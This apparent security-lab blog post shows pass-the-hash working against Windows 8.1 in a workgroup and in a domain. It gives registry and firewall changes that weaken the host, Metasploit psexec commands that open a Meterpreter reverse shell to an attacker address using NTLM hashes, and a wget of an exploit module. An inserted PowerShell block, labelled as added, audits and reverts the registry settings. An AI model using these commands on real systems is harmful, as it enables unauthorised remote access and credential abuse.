Pass the Hash on Windows 8.1

Microsoft claims that the Pass the Hash exploit has finally been patched in Windows 8.1, as trumpeted in October 2013:

http://www.infoworld.com/d/security/windows-81-stops-pass-the-hash-attacks-227875

The man who made the patch will be speaking next week at CCSF.

But when I posted this on Twitter, @obscuresec @passingthehash and @jameslyne engaged me in lively discussion, claiming PtH still works.

And, with their help, I got it working two ways.

1. Simple Demo on a Workgroup

Setup

I made a clean install of Windows 8.1 into a virtual machine, and made these adjustments, as recommended here:

http://colesec.inventedtheinternet.com/hacking-windows-passwords-with-pass-the-hash/

1. In HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters, make sure "RequireSecuritySignature" is set to 0 (it was)

2. In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, add a new DWORD (32-bit) called "LocalAccountTokenFilterPolicy" and set it to 1

3. Disable real-time protection in Windows Defender.
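As an added example (not from the original post), here is a PowerShell audit that reports whether a Windows 8.1 host carries the two registry settings from steps 1 and 2 above, plus a function that reverts them. It assumes an elevated PowerShell session on the host; the function names are my own.

```powershell
# Added example, not from the original post. Reports whether the two registry
# values changed in setup steps 1 and 2 are in their weakened state.
function Test-PthRegistrySettings {
    $checks = @(
        @{  Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
            Name = 'RequireSecuritySignature'
            Weak = 0 },   # 0 = server does not require SMB signing
        @{  Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
            Name = 'LocalAccountTokenFilterPolicy'
            Weak = 1 }    # 1 = UAC remote token filtering disabled for local admins
    )

    foreach ($c in $checks) {
        # Missing value reads as $null; on 8.1 that is the default for both keys
        # except RequireSecuritySignature, which the post found already set to 0.
        $value = (Get-ItemProperty -Path $c.Path -Name $c.Name `
                    -ErrorAction SilentlyContinue).($c.Name)
        $isWeak = ($null -ne $value) -and ($value -eq $c.Weak)
        [pscustomobject]@{
            Setting = $c.Name
            Value   = if ($null -eq $value) { 'absent' } else { $value }
            Status  = if ($isWeak) { 'WEAK' } else { 'OK' }
        }
    }
}

# Reverts the two settings: require SMB signing on the server side and drop the
# LocalAccountTokenFilterPolicy override so UAC token filtering applies again
# to remote logons by local administrator accounts such as Admin2.
function Restore-PthRegistrySettings {
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters' `
        -Name 'RequireSecuritySignature' -Type DWord -Value 1
    Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
        -Name 'LocalAccountTokenFilterPolicy' -ErrorAction SilentlyContinue
}

Test-PthRegistrySettings | Format-Table -AutoSize
```

Note that the domain demo later on the page uses the domain Administrator account, which the LocalAccountTokenFilterPolicy setting does not affect.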

From Kali Linux, perform a Pass-the-Hash attack with this command, adjusting the IP addresses to be correct:

msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.119.241 LPORT=443 RHOST=192.168.119.248 SMBUser=Admin2 SMBPass=aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 E

It works, as shown below:

2. In a Domain

Here's what I did:

1. Make a Server 2012 domain controller as explained here:

http://samsclass.info/345/proj10/p19-S12dc.htm

2. Join Win 8.1 machine to domain

3. In "Network and Sharing Center", click "Change advanced sharing settings". In the Domain profile, turn on "network discovery" and "file and printer sharing".

4. Turn off Windows Firewall for Domain profile

5. In Kali:

cd

cd .msf4/modules

mkdir exploits

cd exploits
mkdir windows

cd windows

mkdir powershell

cd powershell

wget https://raw.github.com/jakxx/metasploit-framework/powershell_psexec/modules/exploits/windows/powershell/powershell_psexec.rb

msfconsole

use exploit/windows/powershell/powershell_psexec
set RHOST 192.168.119.248
set LHOST 192.168.119.241
set ARCH x86
set SMBDomain sam.com
set SMBUser Administrator
set SMBPass 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42
exploit

As you can see below, it worked!

Posted 6:36 pm 2-22-14 by Sam Bowne
Domain version added 8:35 pm 2-22-14